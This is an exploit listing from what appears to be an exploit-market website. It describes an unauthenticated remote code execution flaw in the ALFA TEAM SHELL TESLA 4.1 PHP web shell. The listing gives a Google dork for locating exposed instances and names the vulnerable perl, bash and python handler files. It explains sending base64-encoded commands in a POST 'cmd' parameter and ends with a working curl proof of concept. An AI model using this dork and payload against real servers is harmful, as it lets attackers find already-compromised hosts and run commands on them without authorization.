[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Alfa Team Shell Tesla 4.1 Remote Code Execution Vulnerability

Author
Aryan Chehreghani
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-37159
Category
web applications
Date add
20-12-2021
Platform
php
# Exploit Title: ALFA TEAM SHELL TESLA 4.1 - 'cmd' Remote Code Execution (Unauthenticated)
# Google Dork: inurl:/alfacgiapi intext:alfa
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: http://solevisible.com
# Software Link: https://phpshells.com/alfa-tesla-v4-1-shell
# Version: v4.1
# Tested on: Windows 10 Enterprise x64 , Linux

# [ About - ALFA TEAM SHELL TESLA ] :

#It is one of the most popular web shells used by hackers,They use it to access the server side.

# [ Vulnerable Files ] : 

# 1 . perl.alfa
# 2 . bash.alfa
# 3 . py.alfa

# [ Description ]:

#Execute commands without authentication or logging in to the web shell,
#To use, find only one of the vulnerable files,
#Convert your commands to base64 And Submit your request using the CMD parameter and the POST method.

# [ POC ] :

curl -d "cmd=bHMgLWxh" -X POST http://localhost/alfacgiapi/perl.alfa

#  0day.today [2024-11-16]  #